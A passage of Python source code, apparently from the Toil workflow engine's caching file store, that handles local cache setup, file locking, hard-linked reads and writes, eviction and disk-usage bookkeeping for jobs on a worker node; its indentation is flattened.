# cacheDir has to be 1 levels above local worker tempdir, at the same level as the
# worker dirs. At this point, localTempDir is the worker directory, not the job
# directory.
self.localCacheDir = os.path.join(os.path.dirname(localTempDir),
cacheDirName(self.jobStore.config.workflowID))
self.cacheLockFile = os.path.join(self.localCacheDir, '.cacheLock')
self.cacheStateFile = os.path.join(self.localCacheDir, '_cacheState')
# Since each worker has it's own unique CachingFileStore instance, and only one Job can run
# at a time on a worker, we can bookkeep the job's file store operated files in a
# dictionary.
self.jobSpecificFiles = {}
self.jobName = str(self.jobGraph)
self.jobID = sha1(self.jobName.encode('utf-8')).hexdigest()
logger.debug('Starting job (%s) with ID (%s).', self.jobName, self.jobID)
# A variable to describe how many hard links an unused file in the cache will have.
self.nlinkThreshold = None
self.workflowAttemptNumber = self.jobStore.config.workflowAttemptNumber
# This is a flag to better resolve cache equation imbalances at cleanup time.
self.cleanupInProgress = False
# Now that we've setup all the required variables, setup the cache directory for the
# job if required.
self._setupCache()
@contextmanager
def open(self, job):
"""
This context manager decorated method allows cache-specific operations to be conducted
before and after the execution of a job in worker.py
"""
# Create a working directory for the job
startingDir = os.getcwd()
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
# Check the status of all jobs on this node. If there are jobs that started and died before
# cleaning up their presence from the cache state file, restore the cache file to a state
# where the jobs don't exist.
with self._CacheState.open(self) as cacheInfo:
self.findAndHandleDeadJobs(cacheInfo)
# While we have a lock on the cache file, run a naive check to see if jobs on this node
# have greatly gone over their requested limits.
if cacheInfo.sigmaJob < 0:
logger.warning('Detecting that one or more jobs on this node have used more '
'resources than requested. Turn on debug logs to see more'
'information on cache usage.')
# Get the requirements for the job and clean the cache if necessary. cleanCache will
# ensure that the requirements for this job are stored in the state file.
jobReqs = job.disk
# Cleanup the cache to free up enough space for this job (if needed)
self.cleanCache(jobReqs)
try:
os.chdir(self.localTempDir)
yield
finally:
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / jobReqs * 100 if
jobReqs > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(jobReqs),
requestedDisk=jobReqs))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > jobReqs:
self.logToMaster("Job used more disk than requested. Please reconsider modifying "
"the user script to avoid the chance of failure due to "
"incorrectly requested resources. " + logString,
level=logging.WARNING)
os.chdir(startingDir)
self.cleanupInProgress = True
# Delete all the job specific files and return sizes to jobReqs
self.returnJobReqs(jobReqs)
with self._CacheState.open(self) as cacheInfo:
# Carry out any user-defined cleanup actions
deferredFunctions = cacheInfo.jobState[self.jobID]['deferredFunctions']
failures = self._runDeferredFunctions(deferredFunctions)
for failure in failures:
self.logToMaster('Deferred function "%s" failed.' % failure, logging.WARN)
# Finally delete the job from the cache state file
cacheInfo.jobState.pop(self.jobID)
# Functions related to reading, writing and removing files to/from the job store
def writeGlobalFile(self, localFileName, cleanup=False):
"""
Takes a file (as a path) and uploads it to the job store. Depending on the jobstore
used, carry out the appropriate cache functions.
"""
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
# What does this do?
cleanupID = None if not cleanup else self.jobGraph.jobStoreID
# If the file is from the scope of local temp dir
if absLocalFileName.startswith(self.localTempDir):
# If the job store is of type FileJobStore and the job store and the local temp dir
# are on the same file system, then we want to hard link the files instead of copying
# barring the case where the file being written was one that was previously read
# from the file store. In that case, you want to copy to the file store so that
# the two have distinct nlink counts.
# Can read without a lock because we're only reading job-specific info.
jobSpecificFiles = list(self._CacheState._load(self.cacheStateFile).jobState[
self.jobID]['filesToFSIDs'].keys())
# Saying nlink is 2 implicitly means we are using the job file store, and it is on
# the same device as the work dir.
if self.nlinkThreshold == 2 and absLocalFileName not in jobSpecificFiles:
jobStoreFileID = self.jobStore.getEmptyFileStoreID(cleanupID)
# getEmptyFileStoreID creates the file in the scope of the job store hence we
# need to delete it before linking.
os.remove(self.jobStore._getAbsPath(jobStoreFileID))
os.link(absLocalFileName, self.jobStore._getAbsPath(jobStoreFileID))
# If they're not on the file system, or if the file is already linked with an
# existing file, we need to copy to the job store.
# Check if the user allows asynchronous file writes
elif self.jobStore.config.useAsync:
jobStoreFileID = self.jobStore.getEmptyFileStoreID(cleanupID)
# Before we can start the async process, we should also create a dummy harbinger
# file in the cache such that any subsequent jobs asking for this file will not
# attempt to download it from the job store till the write is complete. We do
# this now instead of in the writing thread because there is an edge case where
# readGlobalFile in a subsequent job is called before the writing thread has
# received the message to write the file and has created the dummy harbinger
# (and the file was unable to be cached/was evicted from the cache).
harbingerFile = self.HarbingerFile(self, fileStoreID=jobStoreFileID)
harbingerFile.write()
fileHandle = open(absLocalFileName, 'rb')
with self._pendingFileWritesLock:
self._pendingFileWrites.add(jobStoreFileID)
# A file handle added to the queue allows the asyncWrite threads to remove their
# jobID from _pendingFileWrites. Therefore, a file should only be added after
# its fileID is added to _pendingFileWrites
self.queue.put((fileHandle, jobStoreFileID))
# Else write directly to the job store.
else:
jobStoreFileID = self.jobStore.writeFile(absLocalFileName, cleanupID)
# Local files are cached by default, unless they were written from previously read
# files.
if absLocalFileName not in jobSpecificFiles:
self.addToCache(absLocalFileName, jobStoreFileID, 'write')
else:
self._JobState.updateJobSpecificFiles(self, jobStoreFileID, absLocalFileName,
0.0, False)
# Else write directly to the job store.
else:
jobStoreFileID = self.jobStore.writeFile(absLocalFileName, cleanupID)
# Non local files are NOT cached by default, but they are tracked as local files.
self._JobState.updateJobSpecificFiles(self, jobStoreFileID, None,
0.0, False)
return FileID.forPath(jobStoreFileID, absLocalFileName)
def writeGlobalFileStream(self, cleanup=False):
# TODO: Make this work with caching
return super(CachingFileStore, self).writeGlobalFileStream(cleanup)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
"""
Downloads a file described by fileStoreID from the file store to the local directory.
The function first looks for the file in the cache and if found, it hardlinks to the
cached copy instead of downloading.
The cache parameter will be used only if the file isn't already in the cache, and
provided user path (if specified) is in the scope of local temp dir.
:param bool cache: If True, a copy of the file will be saved into a cache that can be
used by other workers. caching supports multiple concurrent workers requesting the
same file by allowing only one to download the file while the others wait for it to
complete.
:param bool mutable: If True, the file path returned points to a file that is
modifiable by the user. Using False is recommended as it saves disk by making
multiple workers share a file via hard links. The default is False.
"""
# Check that the file hasn't been deleted by the user
if fileStoreID in self.filesToDelete:
raise RuntimeError('Trying to access a file in the jobStore you\'ve deleted: ' + \
'%s' % fileStoreID)
# Get the name of the file as it would be in the cache
cachedFileName = self.encodedFileID(fileStoreID)
# setup the harbinger variable for the file. This is an identifier that the file is
# currently being downloaded by another job and will be in the cache shortly. It is used
# to prevent multiple jobs from simultaneously downloading the same file from the file
# store.
harbingerFile = self.HarbingerFile(self, cachedFileName=cachedFileName)
# setup the output filename. If a name is provided, use it - This makes it a Named
# Local File. If a name isn't provided, use the base64 encoded name such that we can
# easily identify the files later on.
if userPath is not None:
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
# yes, this is illegal now.
raise RuntimeError(' File %s ' % localFilePath + ' exists. Cannot Overwrite.')
fileIsLocal = True if localFilePath.startswith(self.localTempDir) else False
else:
localFilePath = self.getLocalTempFileName()
fileIsLocal = True
# First check whether the file is in cache. If it is, then hardlink the file to
# userPath. Cache operations can only occur on local files.
with self.cacheLock() as lockFileHandle:
if fileIsLocal and self._fileIsCached(fileStoreID):
logger.debug('CACHE: Cache hit on file with ID \'%s\'.' % fileStoreID)
assert not os.path.exists(localFilePath)
if mutable:
shutil.copyfile(cachedFileName, localFilePath)
cacheInfo = self._CacheState._load(self.cacheStateFile)
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.addToJobSpecFiles(fileStoreID, localFilePath, -1, None)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
else:
os.link(cachedFileName, localFilePath)
self.returnFileSize(fileStoreID, localFilePath, lockFileHandle,
fileAlreadyCached=True)
# If the file is not in cache, check whether the .harbinger file for the given
# FileStoreID exists. If it does, the wait and periodically check for the removal
# of the file and the addition of the completed download into cache of the file by
# the other job. Then we link to it.
elif fileIsLocal and harbingerFile.exists():
harbingerFile.waitOnDownload(lockFileHandle)
# If the code reaches here, the harbinger file has been removed. This means
# either the file was successfully downloaded and added to cache, or something
# failed. To prevent code duplication, we recursively call readGlobalFile.
flock(lockFileHandle, LOCK_UN)
return self.readGlobalFile(fileStoreID, userPath=userPath, cache=cache,
mutable=mutable)
# If the file is not in cache, then download it to the userPath and then add to
# cache if specified.
else:
logger.debug('CACHE: Cache miss on file with ID \'%s\'.' % fileStoreID)
if fileIsLocal and cache:
# If caching of the downloaded file is desired, First create the harbinger
# file so other jobs know not to redundantly download the same file. Write
# the PID of this process into the file so other jobs know who is carrying
# out the download.
harbingerFile.write()
# Now release the file lock while the file is downloaded as download could
# take a while.
flock(lockFileHandle, LOCK_UN)
# Use try:finally: so that the .harbinger file is removed whether the
# download succeeds or not.
try:
self.jobStore.readFile(fileStoreID,
'/.'.join(os.path.split(cachedFileName)))
except:
if os.path.exists('/.'.join(os.path.split(cachedFileName))):
os.remove('/.'.join(os.path.split(cachedFileName)))
raise
else:
# If the download succeded, officially add the file to cache (by
# recording it in the cache lock file) if possible.
if os.path.exists('/.'.join(os.path.split(cachedFileName))):
os.rename('/.'.join(os.path.split(cachedFileName)), cachedFileName)
self.addToCache(localFilePath, fileStoreID, 'read', mutable)
# We don't need to return the file size here because addToCache
# already does it for us
finally:
# In any case, delete the harbinger file.
harbingerFile.delete()
else:
# Release the cache lock since the remaining stuff is not cache related.
flock(lockFileHandle, LOCK_UN)
self.jobStore.readFile(fileStoreID, localFilePath)
os.chmod(localFilePath, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
# Now that we have the file, we have 2 options. It's modifiable or not.
# Either way, we need to account for FileJobStore making links instead of
# copies.
if mutable:
if self.nlinkThreshold == 2:
# nlinkThreshold can only be 1 or 2 and it can only be 2 iff the
# job store is FilejobStore, and the job store and local temp dir
# are on the same device. An atomic rename removes the nlink on the
# file handle linked from the job store.
shutil.copyfile(localFilePath, localFilePath + '.tmp')
os.rename(localFilePath + '.tmp', localFilePath)
self._JobState.updateJobSpecificFiles(self, fileStoreID, localFilePath,
-1, False)
# If it was immutable
else:
if self.nlinkThreshold == 2:
self._accountForNlinkEquals2(localFilePath)
self._JobState.updateJobSpecificFiles(self, fileStoreID, localFilePath,
0.0, False)
return localFilePath
def exportFile(self, jobStoreFileID, dstUrl):
while jobStoreFileID in self._pendingFileWrites:
# The file is still being writting to the job store - wait for this process to finish prior to
# exporting it
time.sleep(1)
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def readGlobalFileStream(self, fileStoreID):
if fileStoreID in self.filesToDelete:
raise RuntimeError(
"Trying to access a file in the jobStore you've deleted: %s" % fileStoreID)
# If fileStoreID is in the cache provide a handle from the local cache
if self._fileIsCached(fileStoreID):
logger.debug('CACHE: Cache hit on file with ID \'%s\'.' % fileStoreID)
return open(self.encodedFileID(fileStoreID), 'rb')
else:
logger.debug('CACHE: Cache miss on file with ID \'%s\'.' % fileStoreID)
return self.jobStore.readFileStream(fileStoreID)
def deleteLocalFile(self, fileStoreID):
# The local file may or may not have been cached. If it was, we need to do some
# bookkeeping. If it wasn't, we just delete the file and continue with no might need
# some bookkeeping if the file store and cache live on the same filesystem. We can know
# if a file was cached or not based on the value held in the third tuple value for the
# dict item having key = fileStoreID. If it was cached, it holds the value True else
# False.
with self._CacheState.open(self) as cacheInfo:
jobState = self._JobState(cacheInfo.jobState[self.jobID])
if fileStoreID not in list(jobState.jobSpecificFiles.keys()):
# EOENT indicates that the file did not exist
raise OSError(errno.ENOENT, "Attempting to delete a non-local file")
# filesToDelete is a dictionary of file: fileSize
filesToDelete = jobState.jobSpecificFiles[fileStoreID]
allOwnedFiles = jobState.filesToFSIDs
for (fileToDelete, fileSize) in list(filesToDelete.items()):
# Handle the case where a file not in the local temp dir was written to
# filestore
if fileToDelete is None:
filesToDelete.pop(fileToDelete)
allOwnedFiles[fileToDelete].remove(fileStoreID)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
continue
# If the file size is zero (copied into the local temp dir) or -1 (mutable), we
# can safely delete without any bookkeeping
if fileSize in (0, -1):
# Only remove the file if there is only one FSID associated with it.
if len(allOwnedFiles[fileToDelete]) == 1:
try:
os.remove(fileToDelete)
except OSError as err:
if err.errno == errno.ENOENT and fileSize == -1:
logger.debug('%s was read mutably and deleted by the user',
fileToDelete)
else:
raise IllegalDeletionCacheError(fileToDelete)
allOwnedFiles[fileToDelete].remove(fileStoreID)
filesToDelete.pop(fileToDelete)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
continue
# If not, we need to do bookkeeping
# Get the size of the file to be deleted, and the number of jobs using the file
# at the moment.
if not os.path.exists(fileToDelete):
raise IllegalDeletionCacheError(fileToDelete)
fileStats = os.stat(fileToDelete)
if fileSize != fileStats.st_size:
logger.warn("the size on record differed from the real size by " +
"%s bytes" % str(fileSize - fileStats.st_size))
# Remove the file and return file size to the job
if len(allOwnedFiles[fileToDelete]) == 1:
os.remove(fileToDelete)
cacheInfo.sigmaJob += fileSize
filesToDelete.pop(fileToDelete)
allOwnedFiles[fileToDelete].remove(fileStoreID)
jobState.updateJobReqs(fileSize, 'remove')
cacheInfo.jobState[self.jobID] = jobState.__dict__
# If the job is not in the process of cleaning up, then we may need to remove the
# cached copy of the file as well.
if not self.cleanupInProgress:
# If the file is cached and if other jobs are using the cached copy of the file,
# or if retaining the file in the cache doesn't affect the cache equation, then
# don't remove it from cache.
if self._fileIsCached(fileStoreID):
cachedFile = self.encodedFileID(fileStoreID)
jobsUsingFile = os.stat(cachedFile).st_nlink
if not cacheInfo.isBalanced() and jobsUsingFile == self.nlinkThreshold:
os.remove(cachedFile)
cacheInfo.cached -= fileSize
self.logToMaster('Successfully deleted cached copy of file with ID '
'\'%s\'.' % fileStoreID, level=logging.DEBUG)
self.logToMaster('Successfully deleted local copies of file with ID '
'\'%s\'.' % fileStoreID, level=logging.DEBUG)
def deleteGlobalFile(self, fileStoreID):
jobStateIsPopulated = False
with self._CacheState.open(self) as cacheInfo:
if self.jobID in cacheInfo.jobState:
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobStateIsPopulated = True
if jobStateIsPopulated and fileStoreID in list(jobState.jobSpecificFiles.keys()):
# Use deleteLocalFile in the backend to delete the local copy of the file.
self.deleteLocalFile(fileStoreID)
# At this point, the local file has been deleted, and possibly the cached copy. If
# the cached copy exists, it is either because another job is using the file, or
# because retaining the file in cache doesn't unbalance the caching equation. The
# first case is unacceptable for deleteGlobalFile and the second requires explicit
# deletion of the cached copy.
# Check if the fileStoreID is in the cache. If it is, ensure only the current job is
# using it.
cachedFile = self.encodedFileID(fileStoreID)
if os.path.exists(cachedFile):
self.removeSingleCachedFile(fileStoreID)
# Add the file to the list of files to be deleted once the run method completes.
self.filesToDelete.add(fileStoreID)
self.logToMaster('Added file with ID \'%s\' to the list of files to be' % fileStoreID +
' globally deleted.', level=logging.DEBUG)
# Cache related methods
@contextmanager
def cacheLock(self):
"""
This is a context manager to acquire a lock on the Lock file that will be used to
prevent synchronous cache operations between workers.
:yields: File descriptor for cache lock file in w mode
"""
cacheLockFile = open(self.cacheLockFile, 'w')
try:
flock(cacheLockFile, LOCK_EX)
logger.debug("CACHE: Obtained lock on file %s" % self.cacheLockFile)
yield cacheLockFile
except IOError:
logger.critical('CACHE: Unable to acquire lock on %s' % self.cacheLockFile)
raise
finally:
cacheLockFile.close()
logger.debug("CACHE: Released lock")
def _setupCache(self):
"""
Setup the cache based on the provided values for localCacheDir.
"""
# we first check whether the cache directory exists. If it doesn't, create it.
if not os.path.exists(self.localCacheDir):
# Create a temporary directory as this worker's private cache. If all goes well, it
# will be renamed into the cache for this node.
personalCacheDir = ''.join([os.path.dirname(self.localCacheDir), '/.ctmp-',
str(uuid.uuid4())])
os.mkdir(personalCacheDir, 0o755)
self._createCacheLockFile(personalCacheDir)
try:
os.rename(personalCacheDir, self.localCacheDir)
except OSError as err:
# The only acceptable FAIL case is that the destination is a non-empty directory
# directory. Assuming (it's ambiguous) atomic renaming of directories, if the
# dst is non-empty, it only means that another worker has beaten this one to the
# rename.
if err.errno == errno.ENOTEMPTY:
# Cleanup your own mess. It's only polite.
shutil.rmtree(personalCacheDir)
else:
raise
# You can't reach here unless a local cache directory has been created successfully
with self._CacheState.open(self) as cacheInfo:
# Ensure this cache is from the correct attempt at the workflow! If it isn't, we
# need to reset the cache lock file
if cacheInfo.attemptNumber != self.workflowAttemptNumber:
if cacheInfo.nlink == 2:
cacheInfo.cached = 0 # cached file sizes are accounted for by job store
else:
allCachedFiles = [os.path.join(self.localCacheDir, x)
for x in os.listdir(self.localCacheDir)
if not self._isHidden(x)]
cacheInfo.cached = sum([os.stat(cachedFile).st_size
for cachedFile in allCachedFiles])
# TODO: Delete the working directories
cacheInfo.sigmaJob = 0
cacheInfo.attemptNumber = self.workflowAttemptNumber
self.nlinkThreshold = cacheInfo.nlink
def _createCacheLockFile(self, tempCacheDir):
"""
Create the cache lock file file to contain the state of the cache on the node.
:param str tempCacheDir: Temporary directory to use for setting up a cache lock file the
first time.
"""
# The nlink threshold is setup along with the first instance of the cache class on the
# node.
self.setNlinkThreshold()
# Get the free space on the device
freeSpace, _ = getFileSystemSize(tempCacheDir)
# Create the cache lock file.
open(os.path.join(tempCacheDir, os.path.basename(self.cacheLockFile)), 'w').close()
# Setup the cache state file
personalCacheStateFile = os.path.join(tempCacheDir,
os.path.basename(self.cacheStateFile))
# Setup the initial values for the cache state file in a dict
cacheInfo = self._CacheState({
'nlink': self.nlinkThreshold,
'attemptNumber': self.workflowAttemptNumber,
'total': freeSpace,
'cached': 0,
'sigmaJob': 0,
'cacheDir': self.localCacheDir,
'jobState': {}})
cacheInfo.write(personalCacheStateFile)
def encodedFileID(self, jobStoreFileID):
"""
Uses a url safe base64 encoding to encode the jobStoreFileID into a unique identifier to
use as filename within the cache folder. jobstore IDs are essentially urls/paths to
files and thus cannot be used as is. Base64 encoding is used since it is reversible.
:param jobStoreFileID: string representing a job store file ID
:return: outCachedFile: A path to the hashed file in localCacheDir
:rtype: str
"""
base64Text = base64.urlsafe_b64encode(jobStoreFileID.encode('utf-8')).decode('utf-8')
outCachedFile = os.path.join(self.localCacheDir, base64Text)
return outCachedFile
def _fileIsCached(self, jobStoreFileID):
"""
Is the file identified by jobStoreFileID in cache or not.
"""
return os.path.exists(self.encodedFileID(jobStoreFileID))
def decodedFileID(self, cachedFilePath):
"""
Decode a cached fileName back to a job store file ID.
:param str cachedFilePath: Path to the cached file
:return: The jobstore file ID associated with the file
:rtype: str
"""
fileDir, fileName = os.path.split(cachedFilePath)
assert fileDir == self.localCacheDir, 'Can\'t decode uncached file names'
# We encode and decode here because base64 can't work with unencoded text
# Its probably worth, later, converting all file name variables to bytes
# and not text.
return base64.urlsafe_b64decode(fileName.encode('utf-8')).decode('utf-8')
def addToCache(self, localFilePath, jobStoreFileID, callingFunc, mutable=False):
"""
Used to process the caching of a file. This depends on whether a file is being written
to file store, or read from it.
WRITING
The file is in localTempDir. It needs to be linked into cache if possible.
READING
The file is already in the cache dir. Depending on whether it is modifiable or not, does
it need to be linked to the required location, or copied. If it is copied, can the file
still be retained in cache?
:param str localFilePath: Path to the Source file
:param jobStoreFileID: jobStoreID for the file
:param str callingFunc: Who called this function, 'write' or 'read'
:param bool mutable: See modifiable in readGlobalFile
"""
assert callingFunc in ('read', 'write')
with self.cacheLock() as lockFileHandle:
cachedFile = self.encodedFileID(jobStoreFileID)
# The file to be cached MUST originate in the environment of the TOIL temp directory
if (os.stat(self.localCacheDir).st_dev !=
os.stat(os.path.dirname(localFilePath)).st_dev):
raise InvalidSourceCacheError('Attempting to cache a file across file systems '
'cachedir = %s, file = %s.' % (self.localCacheDir,
localFilePath))
if not localFilePath.startswith(self.localTempDir):
raise InvalidSourceCacheError('Attempting a cache operation on a non-local file '
'%s.' % localFilePath)
if callingFunc == 'read' and mutable:
shutil.copyfile(cachedFile, localFilePath)
fileSize = os.stat(cachedFile).st_size
cacheInfo = self._CacheState._load(self.cacheStateFile)
cacheInfo.cached += fileSize if cacheInfo.nlink != 2 else 0
if not cacheInfo.isBalanced():
os.remove(cachedFile)
cacheInfo.cached -= fileSize if cacheInfo.nlink != 2 else 0
logger.debug('Could not download both download ' +
'%s as mutable and add to ' % os.path.basename(localFilePath) +
'cache. Hence only mutable copy retained.')
else:
logger.debug('CACHE: Added file with ID \'%s\' to the cache.' %
jobStoreFileID)
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.addToJobSpecFiles(jobStoreFileID, localFilePath, -1, False)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
else:
# There are two possibilities, read and immutable, and write. both cases do
# almost the same thing except for the direction of the os.link hence we're
# writing them together.
if callingFunc == 'read': # and mutable is inherently False
src = cachedFile
dest = localFilePath
# To mirror behaviour of shutil.copyfile
if os.path.exists(dest):
os.remove(dest)
else: # write
src = localFilePath
dest = cachedFile
try:
os.link(src, dest)
except OSError as err:
if err.errno != errno.EEXIST:
raise
# If we get the EEXIST error, it can only be from write since in read we are
# explicitly deleting the file. This shouldn't happen with the .partial
# logic hence we raise a cache error.
raise CacheError('Attempting to recache a file %s.' % src)
else:
# Chmod the cached file. Cached files can never be modified.
os.chmod(cachedFile, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
# Return the filesize of cachedFile to the job and increase the cached size
# The values passed here don't matter since rFS looks at the file only for
# the stat
self.returnFileSize(jobStoreFileID, localFilePath, lockFileHandle,
fileAlreadyCached=False)
if callingFunc == 'read':
logger.debug('CACHE: Read file with ID \'%s\' from the cache.' %
jobStoreFileID)
else:
logger.debug('CACHE: Added file with ID \'%s\' to the cache.' %
jobStoreFileID)
def returnFileSize(self, fileStoreID, cachedFileSource, lockFileHandle,
fileAlreadyCached=False):
"""
Returns the fileSize of the file described by fileStoreID to the job requirements pool
if the file was recently added to, or read from cache (A job that reads n bytes from
cache doesn't really use those n bytes as a part of it's job disk since cache is already
accounting for that disk space).
:param fileStoreID: fileStore ID of the file bein added to cache
:param str cachedFileSource: File being added to cache
:param file lockFileHandle: Open file handle to the cache lock file
:param bool fileAlreadyCached: A flag to indicate whether the file was already cached or
not. If it was, then it means that you don't need to add the filesize to cache again.
"""
fileSize = os.stat(cachedFileSource).st_size
cacheInfo = self._CacheState._load(self.cacheStateFile)
# If the file isn't cached, add the size of the file to the cache pool. However, if the
# nlink threshold is not 1 - i.e. it is 2 (it can only be 1 or 2), then don't do this
# since the size of the file is accounted for by the file store copy.
if not fileAlreadyCached and self.nlinkThreshold == 1:
cacheInfo.cached += fileSize
cacheInfo.sigmaJob -= fileSize
if not cacheInfo.isBalanced():
self.logToMaster('CACHE: The cache was not balanced on returning file size',
logging.WARN)
# Add the info to the job specific cache info
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.addToJobSpecFiles(fileStoreID, cachedFileSource, fileSize, True)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
@staticmethod
def _isHidden(filePath):
"""
This is a function that checks whether filePath is hidden
:param str filePath: Path to the file under consideration
:return: A boolean indicating whether the file is hidden or not.
:rtype: bool
"""
assert isinstance(filePath, (str, bytes))
# I can safely assume i will never see an empty string because this is always called on
# the results of an os.listdir()
return filePath[0] in ('.', '_')
def cleanCache(self, newJobReqs):
"""
Cleanup all files in the cache directory to ensure that at lead newJobReqs are available
for use.
:param float newJobReqs: the total number of bytes of files allowed in the cache.
"""
with self._CacheState.open(self) as cacheInfo:
# Add the new job's disk requirements to the sigmaJobDisk variable
cacheInfo.sigmaJob += newJobReqs
# Initialize the job state here. we use a partial in the jobSpecificFiles call so
# that this entire thing is pickleable. Based on answer by user Nathaniel Gentile at
# http://stackoverflow.com/questions/2600790
assert self.jobID not in cacheInfo.jobState
cacheInfo.jobState[self.jobID] = {
'jobName': self.jobName,
'jobReqs': newJobReqs,
'jobDir': self.localTempDir,
'jobSpecificFiles': defaultdict(partial(defaultdict,int)),
'filesToFSIDs': defaultdict(set),
'pid': os.getpid(),
'deferredFunctions': []}
# If the caching equation is balanced, do nothing.
if cacheInfo.isBalanced():
return None
# List of deletable cached files. A deletable cache file is one
# that is not in use by any other worker (identified by the number of symlinks to
# the file)
allCacheFiles = [os.path.join(self.localCacheDir, x)
for x in os.listdir(self.localCacheDir)
if not self._isHidden(x)]
allCacheFiles = [(path, os.stat(path)) for path in allCacheFiles]
# TODO mtime vs ctime
deletableCacheFiles = {(path, inode.st_mtime, inode.st_size)
for path, inode in allCacheFiles
if inode.st_nlink == self.nlinkThreshold}
# Sort in descending order of mtime so the first items to be popped from the list
# are the least recently created.
deletableCacheFiles = sorted(deletableCacheFiles, key=lambda x: (-x[1], -x[2]))
logger.debug('CACHE: Need %s bytes for new job. Detecting an estimated %s (out of a '
'total %s) bytes available for running the new job. The size of the cache '
'is %s bytes.', newJobReqs,
(cacheInfo.total - (cacheInfo.cached + cacheInfo.sigmaJob - newJobReqs)),
cacheInfo.total, cacheInfo.cached)
logger.debug('CACHE: Evicting files to make room for the new job.')
# Now do the actual file removal
totalEvicted = 0
while not cacheInfo.isBalanced() and len(deletableCacheFiles) > 0:
cachedFile, fileCreateTime, cachedFileSize = deletableCacheFiles.pop()
os.remove(cachedFile)
cacheInfo.cached -= cachedFileSize if self.nlinkThreshold != 2 else 0
totalEvicted += cachedFileSize
assert cacheInfo.cached >= 0
logger.debug('CACHE: Evicted file with ID \'%s\' (%s bytes)' %
(self.decodedFileID(cachedFile), cachedFileSize))
logger.debug('CACHE: Evicted a total of %s bytes. Available space is now %s bytes.',
totalEvicted,
(cacheInfo.total - (cacheInfo.cached + cacheInfo.sigmaJob - newJobReqs)))
if not cacheInfo.isBalanced():
raise CacheUnbalancedError()
def removeSingleCachedFile(self, fileStoreID):
"""
Removes a single file described by the fileStoreID from the cache forcibly.
"""
with self._CacheState.open(self) as cacheInfo:
cachedFile = self.encodedFileID(fileStoreID)
cachedFileStats = os.stat(cachedFile)
# We know the file exists because this function was called in the if block. So we
# have to ensure nothing has changed since then.
assert cachedFileStats.st_nlink == self.nlinkThreshold, 'Attempting to delete ' + \
'a global file that is in use by another job.'
# Remove the file size from the cached file size if the jobstore is not fileJobStore
# and then delete the file
os.remove(cachedFile)
if self.nlinkThreshold != 2:
cacheInfo.cached -= cachedFileStats.st_size
if not cacheInfo.isBalanced():
self.logToMaster('CACHE: The cache was not balanced on removing single file',
logging.WARN)
self.logToMaster('CACHE: Successfully removed file with ID \'%s\'.' % fileStoreID)
return None
def setNlinkThreshold(self):
# FIXME Can't do this at the top because of loopy (circular) import errors
from toil.jobStores.fileJobStore import FileJobStore
if (isinstance(self.jobStore, FileJobStore) and
os.stat(os.path.dirname(self.localCacheDir)).st_dev == os.stat(
self.jobStore.jobStoreDir).st_dev):
self.nlinkThreshold = 2
else:
self.nlinkThreshold = 1
def _accountForNlinkEquals2(self, localFilePath):
"""
This is a utility function that accounts for the fact that if nlinkThreshold == 2, the
size of the file is accounted for by the file store copy of the file and thus the file
size shouldn't be added to the cached file sizes.
:param str localFilePath: Path to the local file that was linked to the file store copy.
"""
fileStats = os.stat(localFilePath)
assert fileStats.st_nlink >= self.nlinkThreshold
with self._CacheState.open(self) as cacheInfo:
cacheInfo.sigmaJob -= fileStats.st_size
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.updateJobReqs(fileStats.st_size, 'remove')
def returnJobReqs(self, jobReqs):
"""
This function returns the effective job requirements back to the pool after the job
completes. It also deletes the local copies of files with the cache lock held.
:param float jobReqs: Original size requirement of the job
"""
# Since we are only reading this job's specific values from the state file, we don't
# need a lock
jobState = self._JobState(self._CacheState._load(self.cacheStateFile
).jobState[self.jobID])
for x in list(jobState.jobSpecificFiles.keys()):
self.deleteLocalFile(x)
with self._CacheState.open(self) as cacheInfo:
cacheInfo.sigmaJob -= jobReqs
# assert cacheInfo.isBalanced() # commenting this out for now. God speed
class _CacheState(FileStore._StateFile):
"""
Utility class to read and write the cache lock file. Also for checking whether the
caching equation is balanced or not. It extends the _StateFile class to add other cache
related functions.
"""
@classmethod
@contextmanager
def open(cls, outer=None):
"""
This is a context manager that opens the cache state file and reads it into an object
that is returned to the user in the yield
"""
assert outer is not None
with outer.cacheLock():
cacheInfo = cls._load(outer.cacheStateFile)
yield cacheInfo
cacheInfo.write(outer.cacheStateFile)
def isBalanced(self):
"""
Checks for the inequality of the caching equation, i.e.
cachedSpace + sigmaJobDisk <= totalFreeSpace
Essentially, the sum of all cached file + disk requirements of all running jobs
should always be less than the available space on the system
:return: Boolean for equation is balanced (T) or not (F)
:rtype: bool
"""
return self.cached + self.sigmaJob <= self.total
def purgeRequired(self, jobReqs):
"""
Similar to isBalanced, however it looks at the actual state of the system and
decides whether an eviction is required.
:return: Is a purge required(T) or no(F)
:rtype: bool
"""
return not self.isBalanced()
# totalStats = os.statvfs(self.cacheDir)
# totalFree = totalStats.f_bavail * totalStats.f_frsize
# return totalFree < jobReqs
# Methods related to the deferred function logic
@classmethod
def findAndHandleDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
:param toil.fileStore.CachingFileStore._CacheState nodeInfo: The state of the node cache as
a _CacheState object
"""
